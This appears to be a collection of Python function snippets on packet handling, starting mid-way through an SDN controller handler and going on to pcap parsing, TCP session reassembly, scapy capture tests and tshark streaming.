IP\n #\n # TODO : At this point only ARPs belonging to the APNs networks subnet should\n # be answered\n if match['eth_type'] == 0x0806 and match['arp_op'] == 2:\n LOG.debug('TUNNEL MNGR: ARP response with target APN discovery IP recieved at controller, processing for APN extraction')\n pkt = packet.Packet(array.array('B', ev.msg.data))\n arp_pkt=pkt.get_protocol(arp.arp)\n apn_ip = arp_pkt.src_ip\n apn_mac= arp_pkt.src_mac\n port = match['in_port']\n\n ##Search for apn in APN_POOL to add mac addr. and update topology\n for sApn in APN_POOL:\n if sApn.ip_addr == apn_ip:\n LOG.debug('Recieved ARP response was from ' + sApn.name + ' APN')\n sApn.eth_addr = apn_mac\n sApn.port = port\n sApn.dpid = dp.id\n # Links towards APNs will not be measured\n topo.add_link(dp.id,str(sApn.name),port)\n topo.add_link(str(sApn.name),dp.id,0)\n topo.reload_topology()\n LOG.debug('TUNNEL MNGR: APN '+str(sApn.name)+' found at forwarder: '+str(dp.id)+', port: '+str(port) + ' by ARP search')\n\n ##Add special rules to edge forwarder\n self.on_edge_inet_dp_join(dp, port, sApn)\n\n # FIX: We do not handle bss as a special APN\n # For greater extensibility, BSS/UTRAN/LAN APNs (exit/enter) points\n # will be handled in a generic manner\n #\n ##Create MAC-tunnels between APN and all BSSs\n #for bss in BSS_POOL:\n # self.add_tunnel(bss,apn)\n #break\n\n ### WMNC: In this case, we are not making tunnels between\n # two types of ingress/egress point, but actually same type\n\n for dApn in APN_POOL:\n # we are cycling through all possible APNs, looking for different APN tupples\n # with filled HW addresses (already found by APN search)\n if sApn != dApn and dApn.eth_addr != None:\n LOG.debug('TUNNEL MNGR: Different APNs with filled HW address found, lets find out if there is tunnel between them')\n\n paths = False\n try:\n paths = nx.all_simple_paths(topo.DynamicGraph, source=sApn.name, target=dApn.name)\n except:\n LOG.debug('TUNNEL MNGR: No path between: ' + sApn.name + ' and ' + dApn.name + '. 
Retry when next APN discovered.')\n\n LOG.debug('TUNNEL MNGR: These are the paths between them (possible tunnels):')\n if paths:\n for path in paths:\n LOG.debug('TUNNEL MNGR: Calling add_plainMacTunnel for ' + sApn.name + ' and ' + dApn.name + ' with path: ' + str(path))\n self.add_plainMacTunnel(sApn, dApn, path)\n else:\n LOG.debug('TUNNEL MNGR: PATHS == 0 ????????????????')\n\n\n return\n\n ##ICMP echo with dst_ip==DISCOVERY_IP_DST recieved - new link between forwarders is up\n if match['eth_type'] == 0x0800 and match['ipv4_dst'] == DISCOVERY_IP_DST and match['ip_proto'] == 1:\n #LOG.debug('TOPO MNGR: ICMP echo recieved at controller, processing for link extraction or latency measurement')\n\n pkt = packet.Packet(array.array('B', ev.msg.data))\n\n ##Discovery pings carry information about sending datapath in payload of icmp packet\n ##these information are in Dictionary format, we parse the out with _icmp_parse_payload() method\n body = _icmp_parse_payload(pkt)\n neighbourDPID=body['dpid']\n neighbourPort=body['port_out']\n\n ## measurement\n ## currentClock moved way up to improve precision\n receivedClock=float(body['clock'])\n currentClock = time.clock()\n latency = currentClock - receivedClock\n\n currentDate = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n\n ##Update latency or add new edges to topology.\n if topo.DynamicGraph.has_edge(dp.id, neighbourDPID) and topo.DynamicGraph.has_edge(neighbourDPID, dp.id):\n topo.StaticGraph[neighbourDPID][dp.id]['pdv'] = topo.StaticGraph[neighbourDPID][dp.id]['lat'] - latency\n topo.StaticGraph[neighbourDPID][dp.id]['lat'] = latency\n topo.StaticGraph[neighbourDPID][dp.id]['upt'] = currentDate\n #topo.StaticGraph[neighbourDPID][dp.id]['upt'] = currentDate\n loss = self.loss_update(neighbourDPID, dp.id, currentDate)\n #LOG.debug('TOPO MNGR: Updating latency ' + str(latency) + ' and date ' + str(currentDate) + ' LOSS: ' + str(loss))\n topo.reload_topology()\n else:\n ## latency not correct for both directions when adding links\n ## update occurs on receive of next measurement packet from oposite direction\n topo.add_link(dp.id, neighbourDPID, ev.msg.match['in_port'], latency, currentDate)\n topo.add_link(neighbourDPID, dp.id, neighbourPort , latency, currentDate)\n LOG.debug('TOPO MNGR: Topology changed: New link between forwarder ID '+str(dp.id)+ ' via port ' + str(ev.msg.match['in_port'])\n +' and forwarder ID '+str(neighbourDPID)+ ' via port ' + str(neighbourPort) + ' was discovered.')\n\n topo.reload_topology()\n ## retry to create tunnels\n ## find better paths between APNs\n for sApn in APN_POOL:\n for dApn in APN_POOL:\n if sApn != dApn:\n LOG.debug('TOPO MNGR: Topology changed: trying to re-build inactive tunnel between:' + sApn.name + ' and ' + dApn.name)\n paths = False\n try:\n paths = nx.all_simple_paths(topo.DynamicGraph, source=sApn.name, target=dApn.name)\n except:\n LOG.debug('No path between: ' + sApn.name + ' and ' + dApn.name + '. 
Retry when next fwd connects.')\n\n LOG.debug('TUNNEL MNGR: These are the paths between them (possible tunnels):')\n if paths:\n for path in paths:\n LOG.debug('TUNNEL MNGR: Calling add_plainMacTunnel for ' + sApn.name + ' and ' + dApn.name + ' with path: ' + str(path))\n self.add_plainMacTunnel(sApn, dApn, path)\n else:\n LOG.debug('TUNNEL MNGR: PATHS == 0 ????????????????')\n return\n\n # flow of last resort (process for routing)\n if match['eth_type'] == 0x0800:\n # LOG.debug('*****************Flow of last resort matched(plain IP), process for routing********'\n # + ' match[ipv4_dst]: ' + str(match['ipv4_dst'] + ' match[ipv4_src]: ' + str(match['ipv4_src']) + ' DSCP: ' + str(match['ip_dscp'])))\n ## Not very proud of myself, but it will do the trick\n ## Turbo lumberjack routing logic\n ## TODO: Implement a longest prefix match routing\n\n candidates = []\n\n for source, destination, ip_dscp in routesList:\n if ((source == match['ipv4_dst'] and destination == match['ipv4_src']) or (source == match['ipv4_src'] and destination == match['ipv4_dst'])) and ip_dscp == match['ip_dscp']:\n # LOG.debug('ROUTING: route source: ' + str(source) + 'destination: ' + str(destination)\n # + ' match[ipv4_dst]: ' + str(match['ipv4_dst'])\n # + ' match[ipv4_src]: ' + str(match['ipv4_src']) + ' DSCP: ' + str(ip_dscp)\n # + ' already exists, aborting addition of new route')\n return\n\n for tunnel in TUNNELS:\n if (tunnel.sApn.ip_addr == match['ipv4_dst'] and tunnel.dApn.ip_addr == match['ipv4_src']) or (tunnel.sApn.ip_addr == match['ipv4_src'] and tunnel.dApn.ip_addr == match['ipv4_dst']):\n LOG.debug('ROUTING: Tunnel candidate found in list of tunnels. Adding tunnel path: ' + str(tunnel.po_edges) + ' to candidates.')\n candidates.append(tunnel)\n\n trafficClass = self.TC_selection(match['ip_dscp'])\n\n if len(candidates) == 0:\n LOG.debug('ROUTING: match[ipv4_dst]: ' + str(match['ipv4_dst'])\n + ' match[ipv4_src]: ' + str(match['ipv4_src']) + ' DSCP: ' + str(match['ip_dscp']))\n LOG.debug('ROUTING: ERROR, NO feasible tunnels for such route.')\n return\n\n LOG.debug('Looking for tunnels: DST_IP: ' + match['ipv4_dst'] + ' SRC_IP: ' + match['ipv4_src'] + ' DSCP: ' + str(match['ip_dscp']) + '(traffic class: ' + str(trafficClass) + ')' + ' Incoming from FWD: ' + str(dp.id))\n tunnel = self.tunnel_selection(trafficClass, candidates)\n LOG.debug('TE MNGR: Selected tunnel Path out: ' + str(tunnel.path_out_str) + ' meter_id: ' + str(tunnel.meter_id))\n\n dscp = match['ip_dscp']\n\n ## meter_id\n ## 2,4,6,8,10 = 500kbps, 1,3,5,7,9 = 1000kbps ...\n ## 0 = 100Gbps\n meter_id = tunnel.meter_id\n\n #\n # FIXME: incomplete set of rules installed on LAN Access forwarders\n # TODO : Philosophy of table IDs should be clarified, as now it total mess!!!\n # TODO : this should be done only once, from that moment, all user plane packets\n # should travelse only forwarder and should not be sent to controller\n\n\n\n #WAY OUT\n dp = dpset.get(tunnel.sApn.dpid)\n parser = dp.ofproto_parser\n ofp = dp.ofproto\n match = parser.OFPMatch (eth_type=0x0800, ipv4_dst=tunnel.dApn.ip_addr, ip_dscp=dscp)\n actions = [parser.OFPActionSetField(eth_src=tunnel.tid_in), parser.OFPActionSetField(eth_dst=tunnel.tid_out)]\n inst = [parser.OFPInstructionGotoTable(MAC_TUNNEL_TABLE), parser.OFPInstructionMeter(meter_id), parser.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS, actions)]\n req = parser.OFPFlowMod(datapath=dp, priority=100, match=match, instructions=inst, table_id=INGRESS_TABLE)\n dp.send_msg(req)\n\n LOG.debug('ROUTING: Installing flow 
ON WAY OUT to forwarderID: ' + str(dp.id) + ',Table: ' + str(INGRESS_TABLE) + ' DP ID: ' + str(tunnel.dApn.dpid) + ' Tunel dApn IP addr: ' + str(tunnel.dApn.ip_addr) + ' Tunnel ID: ' + str(tunnel.tid_out))\n\n dp = dpset.get(tunnel.dApn.dpid)\n parser = dp.ofproto_parser\n ofp = dp.ofproto\n match = parser.OFPMatch (eth_dst=tunnel.tid_out)\n actions = [parser.OFPActionSetField(eth_dst=tunnel.dApn.eth_addr), parser.OFPActionOutput(tunnel.path_out[-1].port_out)]\n inst = [parser.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS, actions)]\n req = parser.OFPFlowMod(datapath=dp, priority=300, match=match, instructions=inst, table_id=ACCESS_ADAPTATION_TABLE_OUT)\n dp.send_msg(req)\n LOG.debug('ROUTING: Installing flow ON WAY OUT to forwarderID: ' + str(dp.id) + ',Table: ' + str(ACCESS_ADAPTATION_TABLE_OUT) + ' DP ID: ' + str(tunnel.dApn.dpid)+ ' Tunel ID: ' + str(tunnel.tid_out)+ ' dApn ETH addr: ' + str(tunnel.dApn.eth_addr))\n\n #WAY IN\n dp = dpset.get(tunnel.dApn.dpid)\n parser = dp.ofproto_parser\n ofp = dp.ofproto\n match = parser.OFPMatch (eth_type=0x0800, ipv4_dst=tunnel.sApn.ip_addr, ip_dscp=dscp)\n actions = [parser.OFPActionSetField(eth_dst=tunnel.tid_in), parser.OFPActionSetField(eth_src=tunnel.tid_out)]\n inst = [parser.OFPInstructionGotoTable(MAC_TUNNEL_TABLE), parser.OFPInstructionMeter(meter_id), parser.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS, actions)]\n req = parser.OFPFlowMod(datapath=dp, priority=100, match=match, instructions=inst, table_id = INGRESS_TABLE)\n dp.send_msg(req)\n LOG.debug('ROUTING: Installing flow ON WAY IN to forwarderID: ' + str(dp.id) + ',Table: ' + str(INGRESS_TABLE) + ' DP ID: ' + str(tunnel.sApn.dpid) + ' Tunel dApn IP addr: ' + str(tunnel.sApn.ip_addr) + ' Tunnel ID: ' + str(tunnel.tid_in))\n\n\n dp = dpset.get(tunnel.sApn.dpid)\n parser = dp.ofproto_parser\n ofp = dp.ofproto\n match = parser.OFPMatch (eth_dst=tunnel.tid_in)\n actions = [parser.OFPActionSetField(eth_dst=tunnel.sApn.eth_addr), parser.OFPActionOutput(tunnel.path_in[-1].port_out)]\n inst = [parser.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS, actions)]\n req = parser.OFPFlowMod(datapath=dp, priority=300, match=match, instructions=inst, table_id=ACCESS_ADAPTATION_TABLE_OUT)\n dp.send_msg(req)\n LOG.debug('ROUTING: Installing flow ON WAY IN to forwarderID: ' + str(dp.id) + ',Table: ' + str(ACCESS_ADAPTATION_TABLE_OUT) + ' DP ID: ' + str(tunnel.sApn.dpid)+ ' Tunel ID: ' + str(tunnel.tid_in)+ ' sApn ETH addr: ' + str(tunnel.sApn.eth_addr))\n\n\n LOG.debug('ROUTING: Rules on access edge forwarders installed')\n LOG.debug('ROUTING: Adding route: DST_IP: ' + tunnel.dApn.ip_addr + ' SRC_IP: ' + tunnel.sApn.ip_addr + ' dscp: ' + str(dscp) + ' path out str: ' + tunnel.path_out_str )\n routesList.append( ( tunnel.sApn.ip_addr, tunnel.dApn.ip_addr, dscp) )\n\n parser = dp.ofproto_parser\n\n for dpid in LAN_TYPE_FORWARDERS:\n ## DUNNO why this rule with low priority still hits traffic which is also matched by rules with IP address matches\n ## Here I delete the rule, it is added on FWD when it connects to controoller\n LOG.debug('TOPO MNGR: Forwarder: ' + str(dpid) + ' is a LAN edge forwarder, deleting rules')\n dp = dpset.get(dpid)\n priority = 2\n match = parser.OFPMatch(eth_type=0x0800)\n actions = [parser.OFPActionOutput(ofp.OFPP_CONTROLLER)]\n self.mod_flow(dp, command=dp.ofproto.OFPFC_DELETE_STRICT,\n table_id=0, actions=actions,\n match=match, priority=priority)\n\n LOG.debug('TOPO MNGR: Forwarder: ' + str(dp.id) + ' is a LAN edge forwarder, installing rules again :)')\n match = 
parser.OFPMatch(eth_type=0x0800)\n actions = [parser.OFPActionOutput(ofp.OFPP_CONTROLLER)]\n self.add_flow(dp, 2, match, actions)", "def cleanse(packets):\n pkts = []\n retran = False\n lost = False\n for pkt in packets:\n if len(pkt['data']) > 0:\n # If first packet just add and move on\n if len(pkts) == 0:\n pkts.append(pkt)\n next_seq = pkt['tcp']['seq_num'] + len(pkt['data'])\n # If next seq num is = to this one add this pkt\n elif pkt['tcp']['seq_num'] == next_seq:\n pkts.append(pkt)\n next_seq = pkt['tcp']['seq_num'] + len(pkt['data'])\n # If next seq num is > than this one there is a \n # Retransmission\n elif pkt['tcp']['seq_num'] < next_seq:\n retran = True\n elif pkt['tcp']['seq_num'] > next_seq:\n lost = True\n else:\n pass\n\n return pkts, retran, lost", "def tcp_traceflow(packet, *, count=NotImplemented):\n if 'TCP' in packet:\n ip = packet['IP'] if 'IP' in packet else packet['IPv6']\n tcp = packet['TCP']\n data = dict(\n protocol=LINKTYPE.get(packet.name.upper()), # data link type from global header\n index=count, # frame number\n frame=packet2dict(packet), # extracted packet\n syn=bool(tcp.flags.S), # TCP synchronise (SYN) flag\n fin=bool(tcp.flags.F), # TCP finish (FIN) flag\n src=ipaddress.ip_address(ip.src), # source IP\n dst=ipaddress.ip_address(ip.dst), # destination IP\n srcport=tcp.sport, # TCP source port\n dstport=tcp.dport, # TCP destination port\n timestamp=time.time(), # timestamp\n )\n return True, data\n return False, None", "def read_packets(serial_input):\n while 1:\n header = scan_to_headerword(serial_input)\n yield header.read_packet(serial_input)", "def next_batch(self):\n\n while self.cap.isOpened():\n flag, frame = self.cap.read()\n yield frame", "def parse_packet(packet, traffic_type, pkt_type, exp_dst, step):\n packet_count = 0\n if(traffic_type == \"encap\"):\n if(pkt_type == \"stp\"):\n for i in packet:\n if ((packet[i]['Ethernet']['IP']['src'] == DST_IP) and\n (packet[i]['Ethernet']['IP']['dst'] == H2_IP) and\n (packet[i]['Ethernet']['IP']['UDP']['dport'] ==\n str(UDP_DPORT)) and\n (packet[i]['Ethernet']['IP']['UDP']['VXLAN']\n ['vni'] == VNI_HEX) and\n (packet[i]['Ethernet']['IP']['UDP']['VXLAN']\n ['Ethernet']['src'] == MAC_A) and\n (packet[i]['Ethernet']['IP']['UDP']['VXLAN']\n ['Ethernet']['dst'] == STP_DEST_MAC) and\n (packet[i]['Ethernet']['IP']['UDP']['VXLAN']\n ['Ethernet']['type'] == '0x8870')):\n packet_count += 1\n else:\n for i in packet:\n if ((packet[i]['Ethernet']['IP']['src'] == DST_IP) and\n (packet[i]['Ethernet']['IP']['dst'] == H2_IP) and\n (packet[i]['Ethernet']['IP']['UDP']['dport'] ==\n str(UDP_DPORT)) and\n (packet[i]['Ethernet']['IP']['UDP']['VXLAN']\n ['vni'] == VNI_HEX) and\n (packet[i]['Ethernet']['IP']['UDP']['VXLAN']\n ['Ethernet']['src'] == MAC_A) and\n (packet[i]['Ethernet']['IP']['UDP']['VXLAN']\n ['Ethernet']['dst'] == exp_dst)):\n packet_count += 1\n\n assert (packet_count == PKT_COUNT), 'Incorrect encapsulation'\n print(\"Correct encapsulation\")\n\n elif(traffic_type == \"decap\"):\n if(pkt_type == \"stp\"):\n for i in packet:\n if ((packet[i]['Ethernet']['src'] == MAC_B) and\n (packet[i]['Ethernet']['dst'] == STP_DEST_MAC) and\n (packet[i]['Ethernet']['type'] == '0x8870')):\n packet_count += 1\n else:\n for i in packet:\n if ((packet[i]['Ethernet']['src'] == MAC_B) and\n (packet[i]['Ethernet']['dst'] == exp_dst)):\n packet_count += 1\n\n assert (packet_count == PKT_COUNT), 'Incorrect decapsulation'\n print(\"Correct decapsulation\")", "def parse_pkt_list(self, log_pkt_list):\n flow_pkts = {}\n for pkt in 
log_pkt_list:\n flowID = pkt.flowID\n if flowID not in flow_pkts.keys():\n flow_pkts[flowID] = [(pkt.time, pkt)]\n else:\n flow_pkts[flowID].append((pkt.time, pkt))\n return flow_pkts", "def group_packets(self, packets):\n sessions = packets.sessions() # groups connections from X to Y as a Scapy PacketList in a dict\n # example: dict['TCP 172.217.17.102:443 > 10.7.2.60:38386'] = PacketList\n\n session_keys = list(sessions.keys()) # force copy so we can alter the dictionary at runtime\n for key in session_keys:\n reversed_key = self.reverse_dict_key(key)\n if(reversed_key != key and sessions.__contains__(reversed_key)):\n sessions[key] += sessions.pop(reversed_key)\n session_keys.remove(reversed_key)\n\n return self.sort_grouped_packets(list(sessions.values()))", "def pkt_gen(self, flow_id):\n i = 0\n fin_time = 0\n while i < self.num_pkts:\n #j = 0\n burst_len = 0\n #pyld = ''.join(choice(ascii_uppercase) for k in range(randint(6, 1460)))\n pyld = ''.join(choice(ascii_uppercase) for k in range(202))\n # create the test packets\n pkt = Ether()/IP()/TCP()/Raw(load=pyld)\n fin_time = round((len(pkt)/self.quantum)/self.weight)\n pkt_id = (flow_id, i)\n tuser = Tuser(len(pkt), fin_time, pkt_id)\n burst_len += len(pkt)\n print ('@ {:.2f} - Send: {} || {}'.format(self.env.now, pkt.summary(), tuser))\n\n # write the pkt and metadata into storage\n self.pkt_out_pipe.put((pkt, tuser))\n\n #j += 1\n i += 1\n if i == self.num_pkts:\n break\n \n # wait a number of clock cycles equivalent to the transmission time of the burst of packets\n #for j in range(PREAMBLE + len(pkt) + IFG):\n #yield self.wait_line_clks(j*self.PREAMBLE + burst_len + j*self.IFG)\n #print (\"f: {} - pkt end: {}\".format(self.flow_id, self.env.now))\n pkt_time = self.PREAMBLE + burst_len + self.IFG\n yield self.wait_line_clks(pkt_time)\n # Insert gap to maintain bit rate\n idle_time = round(pkt_time * self.idle_frac/self.actv_frac)\n #yield self.wait_line_clks(idle_time) # average gap is 64 bytes\n print (\"pkt_time: {} idle_time: {}\".format(pkt_time, idle_time))", "def sniff_continuously(self, packet_count=None):\n \n self.lcapture_tshark = (self.lcapture_tshark or \n self.eventloop.run_until_complete(self._get_tshark_process()))\n\n self._running_processes.add(self.lcapture_tshark)\n\n # Retained for backwards compatibility and to add documentation.\n return self._packets_from_tshark_sync(packet_count=packet_count, \n tshark_process=self.lcapture_tshark)", "def process_pcap(self):\n fp = open(self.pcap, \"rb\")\n pkts = dpkt.pcap.Reader(fp)\n self.process_pkts(pkts)", "def sniff_traffic(hs, count, timeout, traffic_type, pkt_type, exp_dst, step):\n iface = hs.ports['eth1']\n step('Scapy capture started')\n if (traffic_type == \"encap\"):\n packet = hs.libs.scapy.sniff2(\"iface='{}', count={}, timeout={}, \"\n \" filter='port 4789 and (!icmp or !ip6)', \"\n \" prn=lambda x:x.show()\".format(\n iface, count, timeout), True)\n parse_packet(packet, traffic_type, pkt_type, exp_dst, step=step)\n elif (traffic_type == \"decap\"):\n packet = hs.libs.scapy.sniff2(\"iface='{}', count={}, \"\n \" timeout={}, filter='!icmp or !ip6', \"\n \" prn=lambda x:x.show()\".format(\n iface, count, timeout), True)\n parse_packet(packet, traffic_type, pkt_type, exp_dst, step=step)", "def _packets_from_tshark_sync(self, tshark_process, packet_count=None, timeout:float=3.0,\n max_data_length:int=10000):\n # NOTE: This has code duplication with the async version, think about how to solve this\n\n psml_structure, data = 
self.eventloop.run_until_complete(self._get_psml_struct(tshark_process.stdout))\n packets_captured = 0\n\n data = b\"\"\n try:\n while self.is_open.value:\n try:\n packet, data = self.eventloop.run_until_complete(\n self._get_packet_from_stream(tshark_process.stdout, \n data,\n psml_structure=psml_structure,\n got_first_packet=packets_captured > 0, \n timeout=timeout))\n except EOFError:\n echo(\"Caught EOF\", file=Interceptor.stdout)\n self._log.debug(\"EOF reached (sync)\")\n break\n\n if(packet is False): continue\n\n if packet:\n packets_captured += 1\n yield packet\n if packet_count and packets_captured >= packet_count:\n break\n if len(data) > max_data_length:\n data = b''\n finally:\n if tshark_process in self._running_processes:\n self.eventloop.run_until_complete(self._cleanup_subprocess(tshark_process))", "def process(self):\n fp = open(self.pcap, \"rb\")\n pkts = dpkt.pcap.Reader(fp)\n if self.sip and self.dip and self.sp and self.dp:\n self.process_pkts(pkts)", "def _convert_packets_into_batch(self, packets):\n def filter_non_bootstrap_nodes():\n for candidate, packet in packets:\n cid = packet[2:22]\n\n if not cid in self._communities and False: # candidate.sock_addr[0] in self._non_autoload:\n if __debug__:\n logger.warn(\"drop a %d byte packet (received from non-autoload node) from %s\", len(packet), candidate)\n self._statistics.dict_inc(self._statistics.drop, \"_convert_packets_into_batch:from bootstrap node for unloaded community\")\n continue\n\n yield candidate, packet\n\n packets = list(filter_non_bootstrap_nodes())\n if packets:\n return super(TrackerDispersy, self)._convert_packets_into_batch(packets)\n\n else:\n return []", "def capture_packets(self, interface, count=1, timeout=None):\n if interface not in self.packet_captures:\n raise ObjectNotFoundException(\n 'No packet capture is running or was run on host/interface' +\n self.name + '/' + interface)\n tcpd = self.packet_captures[interface]\n return tcpd.wait_for_packets(count, timeout)", "def genLoopPackets(self):\n\n for p in self.get_observations():\n ts = int(time.time() + 0.5)\n packet = pywws2weewx(p, ts,\n self._last_rain_loop, self._last_rain_ts_loop,\n self.max_rain_rate)\n self._last_rain_loop = packet['rainTotal']\n self._last_rain_ts_loop = ts\n if packet['status'] != self._last_status:\n log.info('station status %s (%s)' % \n (decode_status(packet['status']), packet['status']))\n self._last_status = packet['status']\n yield packet", "def next_batch(self, frame_skip_count=5):\n frame_count = 0\n frame_divisor = max(frame_skip_count + 1, 1)\n while True:\n ret, frame = self.cap.read()\n if ret:\n if frame_count % frame_divisor == 0:\n yield frame\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n frame_count += 1\n else:\n break", "def _convert_packets_into_batch(self, packets):\n assert isinstance(packets, (tuple, list))\n assert len(packets) > 0\n assert all(isinstance(packet, tuple) for packet in packets)\n assert all(len(packet) == 2 for packet in packets)\n assert all(isinstance(packet[0], Candidate) for packet in packets)\n assert all(isinstance(packet[1], str) for packet in packets)\n\n for candidate, packet in packets:\n # find associated community\n try:\n community = self.get_community(packet[2:22])\n except KeyError:\n if __debug__:\n dprint(\"drop a \", len(packet), \" byte packet (received packet for unknown community) from \", candidate, level=\"warning\")\n self._statistics.dict_inc(self._statistics.drop, \"_convert_packets_into_batch:unknown community\")\n self._statistics.drop_count += 
1\n continue\n\n # find associated conversion\n try:\n conversion = community.get_conversion(packet[:22])\n except KeyError:\n if __debug__:\n dprint(\"drop a \", len(packet), \" byte packet (received packet for unknown conversion) from \", candidate, level=\"warning\")\n self._statistics.dict_inc(self._statistics.drop, \"_convert_packets_into_batch:unknown conversion\")\n self._statistics.drop_count += 1\n continue\n\n try:\n # convert binary data into the meta message\n yield conversion.decode_meta_message(packet), candidate, packet, conversion\n\n except DropPacket, exception:\n if __debug__:\n dprint(\"drop a \", len(packet), \" byte packet (\", exception,\") from \", candidate, level=\"warning\")\n self._statistics.dict_inc(self._statistics.drop, \"_convert_packets_into_batch:decode_meta_message:%s\" % exception)\n self._statistics.drop_count += 1", "def dump_all_sessions(self, out_dir: str):\n if not os.path.exists(out_dir):\n os.mkdir(out_dir)\n for stream_id in self.streams.keys():\n tcpsession, session_position, network_tuple = self.streams[stream_id]\n out_file = repr(network_tuple)\n out_file = os.path.join(out_dir, out_file + '-' + str(session_position - 1) + \".json\")\n with open(out_file, \"w\") as out_fp:\n out_dict = dict()\n out_dict[\"sip\"] = inet_to_str(network_tuple.sip)\n out_dict[\"dip\"] = inet_to_str(network_tuple.dip)\n out_dict[\"sport\"] = network_tuple.sp\n out_dict[\"dport\"] = network_tuple.dp\n out_dict[\"proto\"] = network_tuple.proto\n hex_payload = []\n ascii_payload = []\n combined_src_payload = \"\"\n combined_dst_payload = \"\"\n session_md5_digester = md5()\n hex_session_md5_digester = md5()\n src_md5_digestor = md5()\n dst_md5_digestor = md5()\n for (ts, pkt_num), pkt_bytes in tcpsession.get_session(session_position - 1):\n eth_pkt = dpkt.ethernet.Ethernet(pkt_bytes)\n src = inet_to_str(eth_pkt.data.src)\n hex_repr = binascii.hexlify(eth_pkt.data.data.data)\n hex_payload.append((src, pkt_num, hex_repr.decode(\"utf-8\")))\n hex_session_md5_digester.update(hex_repr)\n ascii_repr = eth_pkt.data.data.data.decode(\"utf-8\", \"backslashreplace\")\n ascii_payload.append((src, pkt_num, ascii_repr))\n if src == out_dict[\"sip\"]:\n combined_src_payload += ascii_repr\n src_md5_digestor.update(eth_pkt.data.data.data)\n else:\n combined_dst_payload += ascii_repr\n dst_md5_digestor.update(eth_pkt.data.data.data)\n session_md5_digester.update(eth_pkt.data.data.data)\n out_dict[\"tcp_payload_hex\"] = hex_payload\n out_dict[\"tcp_ordered_hex_payload_md5sum\"] = hex_session_md5_digester.hexdigest()\n out_dict[\"tcp_payload_ascii\"] = ascii_payload\n out_dict[\"tcp_ordered_payload_md5sum\"] = session_md5_digester.hexdigest()\n out_dict[\"combined_src_payload\"] = combined_src_payload\n out_dict[\"combined_src_payload_md5sum\"] = src_md5_digestor.hexdigest()\n out_dict[\"combined_dst_payload\"] = combined_dst_payload\n out_dict[\"combined_dst_payload_md5sum\"] = dst_md5_digestor.hexdigest()\n json.dump(out_dict, out_fp, indent=1)", "def create_stream(cls, packet_count=test_packet_count):\n for i in range(0, packet_count):\n info = cls.create_packet_info(cls.src_dst_if, cls.src_dst_if)\n payload = cls.info_to_payload(info)\n p = (\n Ether(dst=cls.src_dst_if.local_mac, src=cls.src_dst_if.remote_mac)\n / IP(\n id=info.index,\n src=cls.src_dst_if.remote_ip4,\n dst=cls.src_dst_if.local_ip4,\n )\n / ICMP(type=\"echo-request\", id=1234)\n / Raw(payload)\n )\n cls.extend_packet(p, 1518, cls.padding)\n info.data = p", "def filter(self, pkt):\n return pkt", "def 
ingest_packet(self, pkt, pkt_receive_timestamp):\n #*** Packet length on the wire:\n self.packet_length = len(pkt)\n #*** Read into dpkt:\n eth = dpkt.ethernet.Ethernet(pkt)\n eth_src = _mac_addr(eth.src)\n eth_dst = _mac_addr(eth.dst)\n eth_type = eth.type\n #*** We only support IPv4 (TBD: add IPv6 support):\n if eth_type != 2048:\n self.logger.error(\"Non IPv4 packet, eth_type is %s\", eth_type)\n return 0\n ip = eth.data\n self.ip_src = socket.inet_ntop(socket.AF_INET, ip.src)\n self.ip_dst = socket.inet_ntop(socket.AF_INET, ip.dst)\n #*** We only support TCP:\n if ip.p != 6:\n self.logger.error(\"Non TCP packet, ip_proto=%s\",\n ip.p)\n return 0\n proto = 'tcp'\n tcp = ip.data\n self.tcp_src = tcp.sport\n self.tcp_dst = tcp.dport\n self.tcp_seq = tcp.seq\n self.tcp_acq = tcp.ack\n self.tcp_flags = tcp.flags\n self.payload = tcp.data\n #*** Generate a hash unique to flow for packets in either direction\n self.fcip_hash = _hash_5tuple(self.ip_src, self.ip_dst, self.tcp_src,\n self.tcp_dst, proto)\n #*** Check to see if we already know this identity:\n db_data = {'hash': self.fcip_hash}\n self.fcip_doc = self.fcip.find_one(db_data)\n if not self.fcip_doc:\n #*** Get flow direction (which way is TCP initiated). Client is\n #*** the end that sends the initial TCP SYN:\n if _is_tcp_syn(tcp.flags):\n self.logger.debug(\"Matched TCP SYN first pkt, src_ip=%s\",\n self.ip_src)\n self.client = self.ip_src\n self.server = self.ip_dst\n self.packet_direction = 'c2s'\n self.verified_direction = 'verified-SYN'\n elif _is_tcp_synack(tcp.flags):\n self.logger.debug(\"Matched TCP SYN+ACK first pkt, src_ip=%s\",\n self.ip_src)\n self.client = self.ip_dst\n self.server = self.ip_src\n self.packet_direction = 's2c'\n self.verified_direction = 'verified-SYNACK'\n else:\n self.logger.debug(\"Unmatch state first pkt, tcp_flags=%s\",\n tcp.flags)\n self.client = self.ip_src\n self.server = self.ip_dst\n self.packet_direction = 'c2s'\n self.verified_direction = 0\n #*** Neither direction found, so add to FCIP database:\n self.fcip_doc = {'hash': self.fcip_hash,\n 'ip_A': self.ip_src,\n 'ip_B': self.ip_dst,\n 'port_A': self.tcp_src,\n 'port_B': self.tcp_dst,\n 'proto': proto,\n 'finalised': 0,\n 'packet_count': 1,\n 'latest_timestamp' : pkt_receive_timestamp,\n 'packet_timestamps': [pkt_receive_timestamp,],\n 'tcp_flags': [tcp.flags,],\n 'packet_lengths': [self.packet_length,],\n 'client': self.client,\n 'server': self.server,\n 'packet_directions': [self.packet_direction,],\n 'verified_direction': self.verified_direction,\n 'suppressed': 0}\n self.logger.debug(\"FCIP: Adding record for %s to DB\",\n self.fcip_doc)\n db_result = self.fcip.insert_one(self.fcip_doc)\n self.packet_count = 1\n\n elif self.fcip_doc['finalised']:\n #*** The flow is already finalised just increment packet count:\n self.fcip_doc['packet_count'] += 1\n #*** Write updated FCIP data back to database:\n db_result = self.fcip.update_one({'hash': self.fcip_hash},\n {'$set': {'packet_count': self.fcip_doc['packet_count']},})\n self.packet_count = self.fcip_doc['packet_count']\n\n else:\n #*** We've found the flow in the FCIP database, now update it:\n self.logger.debug(\"FCIP: found existing record %s\", self.fcip_doc)\n #*** Rate this packet as c2s or s2c direction:\n if self.client == self.ip_src:\n self.packet_direction = 'c2s'\n elif self.client == self.ip_dst:\n self.packet_direction = 's2c'\n else:\n self.packet_direction = 'unknown'\n #*** Increment packet count. 
